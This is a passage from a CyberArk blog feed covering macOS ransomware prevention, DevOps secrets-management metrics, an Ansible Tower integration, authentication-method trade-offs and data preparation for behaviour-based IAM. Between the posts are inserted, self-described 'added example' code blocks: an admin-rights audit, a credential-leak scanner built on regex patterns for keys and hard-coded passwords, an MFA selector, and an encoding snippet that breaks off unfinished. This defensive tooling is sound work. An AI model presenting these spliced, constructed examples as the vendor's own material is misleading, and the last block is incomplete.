Furthermore, macOS has become more popular among developers, making any form of ransomware targeting macOS an even bigger danger. To do their job, developers need to have access to source code, API keys and other shared secrets – making developers the kind of user that attackers target. If macOS is going to be a standard for developers, then it is more important than ever to be able to secure it.

One reason why Macs have become so popular among developers is that Linux and macOS share the same “operating system ancestor,” Unix. Since the majority of web servers use Linux to run web applications, macOS has advantages as a development platform. Developing on Macs involves many programs and concepts that are directly applicable when deploying, operating and managing production web servers on Linux. This isn’t likely to change anytime soon, so developers are going to continue to want to work on macOS, making securing macOS a long-term priority.

With the risk of malware attacks on macOS, it is becoming increasingly necessary for Mac users to have an additional layer of security and, in particular, to have something effective against different attack vectors.

How Do I Prevent Ransomware Attacks on my Mac?

Macs are not bulletproof. No macOS security update is going to be able to counteract all possible security threats. macOS users need to get in the habit of using cybersecurity best practices to keep their endpoints safe.

Don’t assume that the best practices that keep Windows machines safe from ransomware are any less vital for Macs. In fact, keeping Macs safe from malware and ransomware isn’t all that different from securing a Windows machine. Think layered security and good endpoint protection.

  • Keep Mac computers up-to-date. Outdated software is like rotted wood: weak and full of holes. Updates can plug these holes and make it harder for malware to find a way in. So, be sure to update both the operating system and apps often.
  • Be careful what users install or click. We should all know this by now. If a user gets an email from someone he doesn’t know – or a suspicious email from someone he does – he shouldn’t open any attachments or click any links. That’s how infections start.
  • Install apps only from official sites or the Mac App Store. Don’t let users install software from sources that haven’t been vetted. It’s too risky, because they can never be completely sure of what they are going to get. Torrented software could be bundled with various types of ransomware, for example. It’s safer to stick to official websites or the App Store.
  • Make frequent backups. It’s important to back everything up to an external disk, which is then disconnected from the Mac. This way if the Mac gets hit with ransomware, it won’t be able to encrypt the unattached backups. Once the ransomware is safely removed, it’s time to run a full scan to make sure nothing was left behind before reconnecting the backup drive and recovering files.
  • Use anti-virus. Since Macs are not immune to malware and Mac-targeted attacks, anti-virus software can help protect Macs against viruses, malware, rootkits and other signature-based attacks. However, it isn’t enough on its own to ensure complete safety. Malware and anti-virus protection need to be a part of a larger package of security deterrents.
  • Remove admin rights. Limiting administrative privileges is key to protecting any operating system from ransomware attacks and other malware. Keep in mind the principle of least privilege – no one should have access they don’t need and no one should keep access longer than they need it. To do this, run non-elevated users and allow privilege elevation only on approved applications and for approved users. Make sure to utilize application control.
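
The "remove admin rights" and "official sources only" items are easy to verify with an audit script. The following Python is an added example, not CyberArk code: it parses the output of `dscl . -read /Groups/admin GroupMembership` and `spctl --status` (two standard macOS commands) and reports admin accounts that are not on an approved list and whether Gatekeeper assessment is off. The account names, the approved list and the sample command output are constructed.

```python
import subprocess

# Constructed sample output, in the format printed on macOS by
#   dscl . -read /Groups/admin GroupMembership
SAMPLE_DSCL_OUTPUT = "GroupMembership: root itadmin alice buildsvc\n"

# Constructed sample output of `spctl --status` (Gatekeeper state).
SAMPLE_SPCTL_OUTPUT = "assessments enabled\n"

# Constructed allowlist: accounts that are permitted to hold admin rights.
APPROVED_ADMINS = {"root", "itadmin"}


def parse_admin_members(dscl_output):
    """Return the account names listed in the local admin group."""
    for line in dscl_output.splitlines():
        if line.startswith("GroupMembership:"):
            return line.split(":", 1)[1].split()
    return []  # group exists but has no explicit members


def unexpected_admins(dscl_output, approved):
    """Accounts with admin rights that are not on the approved list."""
    return [m for m in parse_admin_members(dscl_output) if m not in approved]


def gatekeeper_enabled(spctl_output):
    """True when Gatekeeper is assessing apps (blocks unsigned/unnotarized installs)."""
    return spctl_output.strip() == "assessments enabled"


def audit(dscl_output, spctl_output, approved):
    """Produce a list of least-privilege and Gatekeeper findings for one Mac."""
    findings = []
    for account in unexpected_admins(dscl_output, approved):
        findings.append(f"admin rights not approved for account: {account}")
    if not gatekeeper_enabled(spctl_output):
        findings.append(
            "Gatekeeper assessments disabled: apps from outside the App Store "
            "or without a valid signature can be installed"
        )
    return findings


def collect_live():
    """Run the real commands; this only works on a macOS host."""
    dscl = subprocess.run(
        ["dscl", ".", "-read", "/Groups/admin", "GroupMembership"],
        capture_output=True, text=True, check=True,
    ).stdout
    spctl = subprocess.run(["spctl", "--status"], capture_output=True, text=True).stdout
    return dscl, spctl


if __name__ == "__main__":
    # Offline demonstration on the constructed samples.
    for finding in audit(SAMPLE_DSCL_OUTPUT, SAMPLE_SPCTL_OUTPUT, APPROVED_ADMINS):
        print(finding)
```

On a real fleet, feed `collect_live()` into `audit()` from your endpoint management tooling and treat any finding as a ticket to remove the extra admin rights.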

macOS users have been hearing for years that all the security they need comes built-in. Once an organization figures out it needs to move beyond that with macOS security, it’s easy to assume that installing anti-virus and reminding users not to click questionable links is enough. But organizations need more than anti-virus software and common sense to stay safe. Comprehensive, proactive privileged access management (PAM) is key to any cybersecurity strategy.

CyberArk is the global leader in privileged access management and CyberArk Endpoint Privilege Manager can help organizations take their endpoint security to the next level – whether they use Windows, macOS or any other operating system.

Learn how you can extend your existing privileged access management program with a free trial of CyberArk Endpoint Privilege Manager.

How to Evaluate Your DevOps Secrets Management Program https://www.cyberark.com/blog/how-to-evaluate-your-devops-secrets-management-program/ Tue, 08 Oct 2019 13:00:42 +0000 https://www.cyberark.com/?p=74989 DevOps Secrets Management Program Evaluation

Editor’s Note: Part 5 of a 5-part series providing practical guidance and insights to security leaders for securing DevOps environments. This series is based on insights from Global 1000 CISOs.

Over the past several months, we have mined the real-world experiences of CISOs from Global 1000 organizations to learn how to meet the challenges of securing DevOps. We’ve explored a number of actionable steps security teams should take to align themselves to DevOps culture and methods while addressing the risks of privileged access. We covered:

  1. Five key steps for bringing DevOps and security teams into alignment
  2. How to prioritize DevOps tools and cloud infrastructure
  3. How to establish enterprise requirements for DevOps
  4. Four things security can do to keep up with DevOps CI/CD
  5. Evaluate the results

In our final installment of The CISO View blog series, we’ll outline best practices for evaluating the results of a DevOps secrets management program. These recommendations can help security teams showcase early successes, home in on areas that require additional efforts and ensure continuous program refinement.

Like all enterprise-wide cybersecurity programs, rolling out a secrets management program typically happens through a phased approach of incremental improvements tightly aligned with DevOps culture. For example, to start, teams can identify and prioritize securing a finite set of build pipelines, applications, databases or other resources with access to sensitive data, by ensuring that the privileged credentials to access them are managed by the centralized secrets management system. Types of sensitive data include regulated data (covered by GDPR, HIPAA, SOX or PCI), proprietary financial data or intellectual property. This incremental approach can both help security teams achieve “quick wins” to demonstrate security and efficiency gains to key stakeholders, while also establishing a path for a broader roll-out to extend the reach of the program.

Test the Deployment of Your Centralized Secrets Management System

In testing the efficacy of your secrets management system, there are four key areas to evaluate.

  1. Developer experience. Developers should be able to use their own machines for testing and then smoothly promote the code to the production environment. It’s important to evaluate if developers can easily find and use well-documented code modules for handling secrets. Additionally, can they test their code for secrets retrieval in their preferred environment?
  2. Failover. If a call to the credential vault does not reach the master system, it should fail over to a second system. Does your program include a robust failover system for the retrieval of secrets?
  3. Scalability. For an enterprise-wide deployment, the secrets management system may need to scale across many thousands of application instances and multiple data centers. Is your system able to handle the scale your organization requires today – and down the road?
  4. Break-glass capability. In circumstances such as networking issues that make secrets inaccessible from the centralized system, it’s important to ensure that remote sites aren’t locked out. Do you have a secure mechanism that can provide temporary access to secrets when the centralized site is not reachable?

Measure Improvements in Risk Reduction and DevOps Practices

It’s also important to establish and track metrics to gain visibility into attack surface coverage and the effectiveness of privileged access controls. Evaluate the following areas to inform those metrics:

  • How many secrets have been secured for tools and applications? (It’s important to have a plan for extending this program to secure more secrets over time.)
  • How capable are you of detecting if privileged credentials are being misused?
  • According to penetration tests or Red Team exercises, are your secrets becoming increasingly secure against attackers?

Some organizations provide scorecards for each DevOps team to measure how well their practices comply with security requirements. These scorecards could measure:

  • Can any of your secrets be found in code repositories on the Internet?
  • What percentage of code commits contain a secret, such as a cloud access key?
  • How many secrets are there per line of code?
  • How often is the secrets vault being used? (If you’re not tracking many transactions after secrets are vaulted, there’s a chance that the DevOps team may be bypassing the process.)
  • Are unique credentials being used where “uniqueness” is mandated?
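
Two of the scorecard figures above (the percentage of commits that introduce a secret, and secrets per line of code) can be produced from a repository's history with a small scanner. The following Python is an added example, not from the CISO View report or any CyberArk product: it checks the added lines of a few constructed commits against credential-shaped patterns (the AWS access key ID format, PEM private-key headers, and password/secret/token variables assigned a quoted literal) and computes the two metrics. All commit contents and key values are constructed.

```python
import re
from dataclasses import dataclass

# Patterns for a few well-known credential shapes. AWS access key IDs are
# "AKIA" plus 16 upper-case alphanumerics; PEM private keys have a fixed
# header; the last pattern catches a password/secret/api-key/token variable
# assigned a quoted literal of 8+ characters, i.e. a hard-coded secret.
# Reading the value from the environment or a vault does not match, which is
# exactly the behaviour the scorecard is meant to reward.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hardcoded_assignment": re.compile(
        r"(?i)(?:password|passwd|secret|api[_-]?key|token)\w*\s*[:=]\s*['\"][^'\"]{8,}['\"]"
    ),
}


@dataclass
class Commit:
    sha: str
    added_lines: list  # the '+' side of the commit's diff


@dataclass
class Finding:
    sha: str
    line_no: int
    kind: str


# Constructed commit history (SHAs and values are not real).
SAMPLE_COMMITS = [
    Commit("c0ffee1", ["def connect(host):", "    return Session(host, timeout=30)"]),
    Commit("c0ffee2", [
        "AWS_ACCESS_KEY_ID = 'AKIAEXAMPLEKEY000001'",
        "AWS_SECRET_ACCESS_KEY = 'notarealsecret1234567890'",
        "region = 'us-east-1'",
    ]),
    Commit("c0ffee3", [  # secrets fetched at runtime: should NOT be flagged
        "db_password = os.environ['DB_PASSWORD']",
        "api_key = vault.get('prod/api')",
    ]),
    Commit("c0ffee4", ['password: "changeme-please-123"', "username: deploy"]),
    Commit("c0ffee5", ["-----BEGIN RSA PRIVATE KEY-----", "MIIEowIBAAKCAQEAconstructedNotARealKey"]),
]


def scan_commit(commit):
    """Return one Finding per (added line, pattern) match in a commit."""
    findings = []
    for idx, line in enumerate(commit.added_lines, start=1):
        for kind, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(commit.sha, idx, kind))
    return findings


def scorecard(commits):
    """Compute the two scorecard metrics over a list of commits."""
    total_lines = sum(len(c.added_lines) for c in commits)
    findings = [f for c in commits for f in scan_commit(c)]
    commits_with_secret = {f.sha for f in findings}
    pct = 100.0 * len(commits_with_secret) / len(commits) if commits else 0.0
    per_line = len(findings) / total_lines if total_lines else 0.0
    return {
        "commits": len(commits),
        "commits_with_secret": len(commits_with_secret),
        "pct_commits_with_secret": round(pct, 1),
        "secrets_found": len(findings),
        "secrets_per_line": round(per_line, 3),
        "findings": findings,
    }


if __name__ == "__main__":
    result = scorecard(SAMPLE_COMMITS)
    for f in result["findings"]:
        print(f"{f.sha} line {f.line_no}: {f.kind}")
    print({k: v for k, v in result.items() if k != "findings"})
```

Tracking these numbers per DevOps team over successive sprints shows whether vaulting is actually being adopted or bypassed.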

In addition to measuring these improvements, it’s important to help internal and external auditors understand the security controls in place for protecting your organization’s DevOps and cloud environments. They may not be familiar with the newer tools, techniques and automated methods that the security team is implementing. To ensure their compliance assessments are accurate, auditors need to be kept up-to-date.

One of the report contributors said it best: “DevOps is a game changer. People are starting to recognize that you can’t do it without security.”

For organizations embarking on digital transformation initiatives, it has never been more important to align security and risk postures across new tools and technologies. We hope this CISO View series has inspired you to examine your own programs and commit to driving deeper developer collaboration, more effectively assessing risk and prioritizing steps to protect DevOps processes while maintaining developer velocity.

To learn more, we encourage you to download The CISO View report in its entirety, watch a brief highlights video and tune in to our on-demand webinar.

AnsibleFest: CyberArk Presents Ansible Tower Integration https://www.cyberark.com/blog/ansiblefest-cyberark-presents-ansible-tower-integration/ Thu, 03 Oct 2019 16:39:15 +0000 https://www.cyberark.com/?p=74768 CyberArk on display at AnsibleFest

Several members of the CyberArk team recently returned from AnsibleFest 2019, a four-day conference focused on Ansible, Red Hat’s open source automation management platform. Brandon Traffanstadt, Global Director for Solutions Engineering, and DevOps Security Guru Joe Garcia attended the conference in Atlanta. At AnsibleFest, they delivered presentations on integrations with Ansible’s new security automation platform, highlighting a number of CyberArk integrations with Ansible solutions. There was a lot of interest in the new integration that provides Ansible Tower users with an easy-to-use menu option to select CyberArk to secure, manage and rotate the secrets used by Ansible Tower.

Right after the event I was able to catch up with Brandon and Joe to ask each of them how the conference went…

What did you present on at AnsibleFest?

BT: The area my talk focused on was CyberArk’s integration with Ansible Security Automation.

The integration between CyberArk’s secure platform and Ansible Security Automation allows organizations to programmatically respond to environmental changes as well as input from other security solutions. For instance, if something out of the ordinary happens – like Joe clicking on a malicious funny cat video – it could trigger a company’s email security system to flag him as being a compromised user.

Once Ansible receives this information, it could then take proactive action to disable this user or require a password change, even going as far as to change the security policy by requiring additional authentication or approval to use any privileged accounts that he had access to within CyberArk. The Ansible Security Automation with CyberArk helps automate incident response around an organization’s most privileged assets.

[Image: Joe Garcia presents on CyberArk’s integration with Ansible Tower.]

JG: What I spoke about in my talk is that, in the most recent version of Ansible Tower – version 3.5.1 – Ansible introduced the idea of a secrets management system. What that essentially means is that Ansible Tower has a credential store where it will encrypt at-rest secrets that you need in order to log in to the remote host, the private key that’s needed to log in, things like that.

People need secrets in order to log in and then configure a remote resource. Ansible always had a built-in way to do it, but this created a security island. When you don’t centralize all that management and auditing, it becomes a lot harder to maintain. That’s where our secrets management integration comes in. Instead of having the secrets stored in Ansible Tower itself, it redirects any attempts to get credentials from Ansible Tower to our backend, through the CyberArk Privileged Access Security Solution.

The integration creates secret look-ups in Ansible Tower with the relevant information that’s needed in order to make the connections back to the CyberArk solution. Then you can start to create machine credentials, Amazon Web Services credentials and different types of cloud credentials. Instead of having the information in Ansible Tower, the integration will grab those credentials just-in-time from CyberArk. Then it will provide that securely into the playbook and connect to the machine securely. This allows you to start getting that centralized management rotation.

You’re staying within compliance now. You’re not changing things or breaking automation. At the same time, we get to audit all the access throughout the different nodes in Ansible. People are really starting to like the fact that they don’t have to manage secrets separately in Ansible Tower anymore. They have CyberArk to go to as a central source.

What kind of reaction did you get?

JG: Compared to past events, I’d say one of the biggest changes was the interest and enthusiasm around security and automation.

This year for my talk I had a packed room with more than a hundred people all interested in learning about how to deal with security at inception using Ansible with CyberArk and secrets management. The conversations I had with attendees afterwards really reinforced the impact we can have on how companies approach security.

[Image: AnsibleFest attendees visit CyberArk’s booth to learn about the CyberArk approach to secrets management.]

BT: The single biggest piece of feedback I received from the conversations we had at the booth and outside the booth was that folks at AnsibleFest are interested in learning more about secrets management and CyberArk’s approach. There’s a lot of thirst for education happening in the market right now.  It’s an exciting time to be in this space.

For example, automation developers were really interested in hearing about CyberArk’s integration with Ansible Tower. One of the problems people were having is that secrets rotation, a requirement that is being mandated in many cases by their security teams, is manual in Ansible Tower. This makes it hard to make sure that the credentials are getting rotated when and how they should be. If you’re not using Tower, this means that you’d potentially have to go out and update playbooks, scripts and other artifacts after every rotation cycle, which is pretty much a terrible way to spend a few afternoons.

IT managers were really surprised at how much easier credential rotation was with CyberArk handling it. Attendees working for companies that already leverage CyberArk for Privileged Access Management were also very interested to hear about the integrations with Ansible that are already part of the core solution – from using Ansible to deploy elements of the platform to leveraging the CyberArk collection within Galaxy to automate tasks – like secrets onboarding – within CyberArk.

It’s a really exciting time. There’s so much more follow-up we can do after hearing, “Oh man, I would really love to learn more.”

What’s next?

If you weren’t able to make it to Atlanta this year for Brandon and Joe’s talks, stay tuned as we are scheduling a follow-up webinar to help security teams enable their automation-focused developers and IT staff to leverage CyberArk to secure their Ansible environments. You can also discuss the Ansible integrations in the new CyberArk Commons discussion forum and access the CyberArk/Ansible integrations in the CyberArk Marketplace and on www.conjur.org. If you’re in Chicago, we’re planning a half-day workshop with Ansible later this year. Contact sales@cyberark.com for additional information.

Comparison of User Authentication Methods on Three Parameters https://www.cyberark.com/blog/comparison-of-user-authentication-methods-on-three-parameters/ Thu, 03 Oct 2019 14:12:16 +0000 https://www.cyberark.com/?p=98962

Evaluating user authentication methods based on usability, security, and deployability.

A plethora of user authentication methods exists today to distinctly identify a given user (or another entity such as a system). It all started with the humble password. These days, systems like Apple’s Face ID use a cutting-edge combination of sensors and neural networks to make the experience seamless yet extremely secure for end-users. It may not match the human brain’s identification mechanism yet – a person can detect an acquaintance by face, voice, walk, etc. – but it’s getting pretty close for sure!

Every user authentication method can generally be evaluated using the following three key parameters:

  1. Usability: How natural and hassle-free is it for the end-user to use this authentication?
  2. Security: How difficult is it for a malicious actor to trick the authentication?
  3. Deployability: How easy is it to deploy for all users across platforms, devices, geographies, etc.? An important consideration is whether the use case is B2C or B2E, meaning whether the end-user is a consumer or an employee.

Also, there are broadly three categories of user authentication methods:

  1. Something You Know: A shared secret like a password or secret question. Usually these are easiest to deploy across all devices and platforms, but not very secure as they are easy targets for phishing and other hacks.
  2. Something You Have: Another device such as a FIDO-compliant key. Usually these are very secure against phishing and other hacks, as the private key never leaves the authenticator device. They are, however, prone to physical theft and not easy to use in B2C scenarios, as a consumer usually doesn’t own special authenticator devices.
  3. Something You Are: These are basically biometric methods like a fingerprint or facial recognition. These are usually the most natural to use for end-users but depend very heavily on the underlying device or platform. They are clearly the future, but only if all platforms use secure hardware and software, and can play well with each other! They also almost always need a backup mechanism (for example, what if you cut your finger?) but this presents an Achilles heel, as the backup mechanism can potentially be targeted by an attacker.

Now that we understand the broad taxonomy of user authentication methods, here is a tabular view of some of the most popular authentication methods with scores for each of the three parameters. Please note that these scores are meant to be simple relative indicators to broadly understand the relative strengths and weaknesses of each method.

| Authentication Method | Category | Usability | Security | Deployability | Comments |
| --- | --- | --- | --- | --- | --- |
| Apple Face ID | SYA | 9 | 8 | 2 | Secure and easy to use, but only useful on some Apple devices, not very interoperable across apps. E.g. doesn’t yet support a standard like FIDO2, isn’t even supported yet on MacBooks. |
| Face Recognition | SYA | 9 | 7 | 2 | Generic face recognition – inconsistent security, heavily depends on device hardware and software. E.g. security of Android face recognition depends heavily on the device brand. |
| Fingerprint Recognition | SYA | 7 | 7 | 4 | Generally secure and more deployable than face recognition, getting more deployable every year. Pretty much all smartphones have a decent enough fingerprint scanner. |
| FIDO 2 U2F | SYH | 6 | 7 | 3 | Only meant as a strong second factor, depends on compatible devices such as YubiKey, so widely used in B2E use cases but cannot be used in B2C. |
| FIDO 2 | SYH | 6 | 8 | 3 | Leverages biometric authenticators and is trying to make them interoperable across devices by working with all industry players, but has some time to mature in terms of support. |
| SMS OTP | SYH | 3 | 5 | 8 | Not very secure as prone to SIM swap attack, but is heavily used as the second factor in B2C scenarios, as every user has a smartphone. |
| OATH OTP (Soft Tokens) | SYH | 3 | 8 | 5 | Quite secure, but needs an Authenticator app and the user needs to know how to set it up. It could be useful if the end-user is tech-savvy, usually B2E scenarios. |
| Passwords | SYK | 4 | 3 | 6 | The most ubiquitous because of history and deployability, but has well-known security issues. All security professionals want it to go away as soon as possible. |
| Secret Questions | SYK | 5 | 2 | 7 | Arguably worse than passwords, especially in the age of social media as lots of information about users is publicly available. |
| Personal Info | SYK | 6 | 0 | 8 | Asking for personal information such as DOB is a horrible method in the age of social media. It should not even be listed as an authentication method, but I have seen some services using it. |
| Email OTP | SYK | 4 | 5 | 7 | A decent method for B2C scenarios, like SMS, and doesn’t depend on another device, but relies heavily on the efficiency and security of the user’s email service. |

SYA – Something You Are; SYH – Something You Have; SYK – Something You Know

If we plot these scores on a bubble chart, with the size of the bubble representing Deployability, Security on Y-axis, and Usability on X-axis, it would look something like this:

Figure: Comparison of User Authentication Methods on 3 parameters – Security, Usability, and Deployability. The size of a bubble indicates the Deployability of that authentication method.

Looking at this, you can easily see that in most situations a single user authentication method cannot be your silver bullet. That’s where intelligent adaptive MFA comes into the picture. It can decide when and whether to use a second factor, preferably from a different category than the first factor depending upon security policies or even patterns of usage analyzed by machine learning. This enables the security admin to cherry-pick the best combination of Security, Usability, and Deployability.

One must also consider the nature of the end users. A typical deployment for the B2E use case (end users are employees) may use certificate-based zero sign-on (ZSO) for most normal cases and add a second factor such as FIDO2 authentication for sensitive access. A typical deployment for the B2C use case (end users are consumers) may use a biometric if the device supports it, a password as the fallback if it doesn’t, and an SMS OTP as step-up authentication for important transactions, such as a money transfer.
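Here is an added example, not code from the original post or from any product, of how an adaptive MFA policy might pick the step-up factor described above: it takes the first factor’s category, a risk score and the capabilities of the device, insists on a factor from a different category (SYK/SYH/SYA) where one is available, and ranks the qualifying candidates with the scores from the table. The score weights, the risk thresholds and the device-capability tags (faceid, fido2, phone and so on) are assumptions made for this illustration.

```javascript
// Added example (not from the CyberArk post): selecting a step-up factor for adaptive MFA.
// The 0-10 scores are the relative indicators from the table above; the risk thresholds,
// audience weights and device-capability tags are assumptions made for this illustration.
const METHODS = [
  { name: 'Apple Face ID',           category: 'SYA', usability: 9, security: 8, deployability: 2, needs: ['faceid'] },
  { name: 'Face Recognition',        category: 'SYA', usability: 9, security: 7, deployability: 2, needs: ['face'] },
  { name: 'Fingerprint Recognition', category: 'SYA', usability: 7, security: 7, deployability: 4, needs: ['fingerprint'] },
  { name: 'FIDO U2F',                category: 'SYH', usability: 6, security: 7, deployability: 3, needs: ['security-key'] },
  { name: 'FIDO2',                   category: 'SYH', usability: 6, security: 8, deployability: 3, needs: ['fido2'] },
  { name: 'SMS OTP',                 category: 'SYH', usability: 3, security: 5, deployability: 8, needs: ['phone'] },
  { name: 'OATH OTP (Soft Tokens)',  category: 'SYH', usability: 3, security: 8, deployability: 5, needs: ['authenticator-app'] },
  { name: 'Passwords',               category: 'SYK', usability: 4, security: 3, deployability: 6, needs: [] },
  { name: 'Secret Questions',        category: 'SYK', usability: 5, security: 2, deployability: 7, needs: [] },
  { name: 'Personal Info',           category: 'SYK', usability: 6, security: 0, deployability: 8, needs: [] },
  { name: 'Email OTP',               category: 'SYK', usability: 4, security: 5, deployability: 7, needs: ['email'] },
];

// Assumed policy knobs: B2E leans on security, B2C gives deployability more weight.
const WEIGHTS = {
  B2E: { security: 0.6, usability: 0.2, deployability: 0.2 },
  B2C: { security: 0.5, usability: 0.2, deployability: 0.3 },
};
const STEP_UP_RISK = 0.3; // below this, the first factor alone is accepted
const HIGH_RISK = 0.8;    // at or above this, the step-up must score 7+ on security

function weightedScore(method, w) {
  return w.security * method.security + w.usability * method.usability + w.deployability * method.deployability;
}

// Returns the name of the step-up method, or null when the risk does not warrant one.
// Throws when a step-up is required but nothing available on the device satisfies the policy.
function pickStepUp({ firstFactor, riskScore, deviceCaps, audience }) {
  if (riskScore < STEP_UP_RISK) return null;
  const first = METHODS.find((m) => m.name === firstFactor);
  if (!first) throw new Error(`unknown first factor: ${firstFactor}`);
  const w = WEIGHTS[audience];
  if (!w) throw new Error(`unknown audience: ${audience}`);

  const minSecurity = riskScore >= HIGH_RISK ? 7 : 5;
  const usable = METHODS.filter((m) =>
    m.name !== first.name &&
    m.security >= minSecurity &&
    m.needs.every((cap) => deviceCaps.includes(cap)));

  // Prefer a factor from a different category so that one compromise (a phished
  // password, a stolen key) does not defeat both; fall back to the same category
  // only when nothing from another category is available on this device.
  const otherCategory = usable.filter((m) => m.category !== first.category);
  const candidates = otherCategory.length ? otherCategory : usable;
  if (!candidates.length) throw new Error('no step-up factor satisfies the policy on this device');

  return candidates.reduce((best, m) => (weightedScore(m, w) > weightedScore(best, w) ? m : best)).name;
}
```

With these knobs, a B2E user who signed in with a password at high risk on a device that has a FIDO2 authenticator, an authenticator app and a phone number gets FIDO2 as the step-up, while a B2C user who signed in with a fingerprint at moderate risk on a device that only offers a phone number and an email address gets SMS OTP, matching the B2C pattern described above.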

Simple Rules for Smart IAM Solutions. – Part 2: Contexts & The Data Science Behind https://www.cyberark.com/blog/simple-rules-for-smart-iam-solutions-part-2-contexts-the-data-science-behind/ Wed, 02 Oct 2019 17:40:44 +0000 https://www.cyberark.com/?p=99387

Part 2 in a series on understanding how to evaluate IAM solutions – let’s dive into contexts and data science!

In my last blog we covered the basic rules that can be used to evaluate IAM solutions that leverage User Behavior Analytics (UBA) and Machine Learning to adapt to risk. As a refresher, here are the four rules of thumb, which we briefly covered in that blog post:

  1. The more contexts the tool is able to collect data from, the higher the fidelity and reliability of the tool. If you have garbage going in, you will have garbage coming out.
  2. Automation is key: how efficiently and seamlessly the tool stitches data and processes coming from various sources for the various contexts.
  3. Automation goes hand in hand with Orchestration: how well the tool is able to interact with other tools and workflows.
  4. UBA based continuous authentication must lead to better end user experience!

In this blog we’ll dig deeper into the first rule, which is all about collecting data from the right sources and then leveraging data science to pick the right features and transformation techniques. The ultimate goal is to design a solution that leverages UBA to detect risk and further bolster access security. As we discuss these topics, you will very quickly realize that the entire process is as much an art as it is a science, and that it varies from domain to domain and dataset to dataset. So, let’s dive in!

Identifying Contexts

From thirty thousand feet, the world of access may seem simple and straightforward: an entity tries to access a resource that may be on-prem or in the cloud. Everything else stays hidden until you zoom in and analyze the other components at play and how they affect the riskiness of a given access session for a particular user<->resource combination. Let’s zoom in and identify some of the other pieces of the puzzle. These help stitch the many moving parts together and arrive at a model for collecting an optimized set of data and establishing users’ behavior profiles. These profiles can then be augmented with additional intelligence sources, and subsequent user actions and behaviors can be compared against them to spot anomalous activity and determine risk. The figure below captures an over-simplified version of the whole process:

Image1

Getting Data!

Getting the right data drives the various contexts needed to help put the pixels together to identify the behavior profiles of the subjects. Let’s start with the obvious question of “how could we define a user”? This is where asking the right questions starts to matter and where art and science start to converge.

  1. Is this a B2E (aka workforce), B2C or B2B use case? For this blog, let’s assume the workforce use case.
  2. What’s the nature of the workforce in terms of geographical distribution and remote vs. office employees?
  3. What kinds of resources are being accessed and protected by the access management (AM) solution?
  4. What kind of policy does the enterprise have for mobile devices and end points in general? (For example, BYOD or not?)
  5. How does the enterprise grant network access to on/off-prem apps? At what layers are various network and app perimeters protected?
  6. Is the enterprise employing the services of a CASB to monitor fine grain aspects of access to apps in the cloud?
  7. Does the enterprise have DLP solutions in place to detect and prevent data leak, knowingly or unknowingly by malicious or compromised users?

And so on and so forth. You get the drift.

More importantly, why are we asking these questions? The answer, in data science terms, is that they help us extract the right features from a given dataset and derive the dataset’s various characteristics. So, let’s slice and dice those questions.

Question one helps gauge the scale of a typical dataset, which in turn determines the size of the training set, and lets us extract statistical distributions for the various access events, such as login activity, app launch activity, commonly used factors, etc. It is always best practice to get a healthy dataset and then analyze it for distributions with statistical tests such as a normality test.

image2

 

Question two determines the importance and variance of location and time context, which in turn determines the weight of geolocation in defining a user’s behavior. Below is the geo-distribution for an example dataset.

question 2 image

Question three determines the nature of the work that the users perform and how that can then be used to detect any anomalous behavior.

Question four establishes the role of device fingerprinting in defining users’ behavior, and based on enterprise policy, we can determine how basic/rich the levels of information we can gather for the various endpoints.

Question five guides the role of network fingerprinting in discovering & profiling users’ behavior and preferences, and will also help us in determining the sources we could go to in order to collect that information.

Questions six and seven determine the role of gathering external threat intel from sources that compute risk based on complementary factors, such as application sessions and activities related to data access. For example, CASBs can give us richer visibility into application sessions and the risk associated with them.

question 6 and 7 image

After doing the due diligence of slicing and dicing, the result is a data frame with multiple instances. This can define all the key aspects potentially required to identify the behaviors of each member of the workforce accessing resources.

 

image 3

Now let’s look at how to go about getting these contexts and from which potential sources.

From the Right Sources

Identifying the right sources for these contexts is key since that will determine such things as:

  1. The attributes associated with the contexts and how coarse and fine-grain they are.
  2. The frequency at which you are able to collect this data.
  3. Scale and performance of the collection system, which depends on whether you generate this data yourself without any external/3rd-party dependency or integrate with an external system (such as a partner or a syslog server, for example).

The figure below captures some of the potential sources that a UBA based AM solution may get relevant data to be able to extract some of the contexts mentioned above.

image 4

Cleaning the Data:

This is by far the most crucial step in the entire data processing workflow and will decide the reliability and efficiency of the model. This is a multi-step process which requires you to become completely familiar with your data and know such things as:

  1. The type of variables (Continuous, Categorical). Check out this article for more information.
  2. If Categorical, then you would have to encode it with one of the many techniques out there. This is a very critical step in data processing and careful considerations must be given to the various pros and cons that accompany the various encoding techniques. Check out this article to whet your appetite on this topic.

image5

Below is an illustration of a subset of data that Idaptive collects, which requires encoding.

image6
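As an added example (not code from the post or from Idaptive), here is what that encoding step looks like once the contexts above have been reduced to a few categorical fields, and how the encoded vectors feed a per-user baseline that later events are compared against. The login events are constructed sample data; the field names, the hour-of-day bucketing and the 10% “rare value” cut-off are assumptions, and the novelty score is a deliberately simple stand-in for the model a real UBA engine would train on the encoded vectors.

```javascript
// Added example (not from the CyberArk post): one-hot encoding of categorical login
// attributes and a per-user baseline built from the encoded vectors. Field names, the
// hour buckets and the "rare" cut-off are assumptions; the events are constructed data.
const FIELDS = ['country', 'deviceType', 'hourBucket', 'app'];

// Continuous hour-of-day is bucketed into a categorical feature before encoding.
function hourBucket(hour) {
  if (hour < 6 || hour >= 22) return 'night';
  return hour < 18 ? 'business' : 'evening';
}
const withBucket = (e) => ({ ...e, hourBucket: hourBucket(e.hour) });

// Constructed workforce login events (not real data).
const TRAINING = [
  { user: 'alice', country: 'US', deviceType: 'laptop',  hour: 9,  app: 'crm' },
  { user: 'alice', country: 'US', deviceType: 'laptop',  hour: 10, app: 'crm' },
  { user: 'alice', country: 'US', deviceType: 'laptop',  hour: 14, app: 'crm' },
  { user: 'alice', country: 'US', deviceType: 'laptop',  hour: 16, app: 'mail' },
  { user: 'alice', country: 'US', deviceType: 'phone',   hour: 8,  app: 'mail' },
  { user: 'alice', country: 'US', deviceType: 'laptop',  hour: 11, app: 'crm' },
  { user: 'bob',   country: 'DE', deviceType: 'desktop', hour: 9,  app: 'erp' },
  { user: 'bob',   country: 'DE', deviceType: 'desktop', hour: 23, app: 'erp' },
].map(withBucket);

// Vocabulary: the sorted set of values seen for each categorical field in the training data.
function buildVocab(events) {
  const vocab = {};
  for (const f of FIELDS) vocab[f] = [...new Set(events.map((e) => e[f]))].sort();
  return vocab;
}

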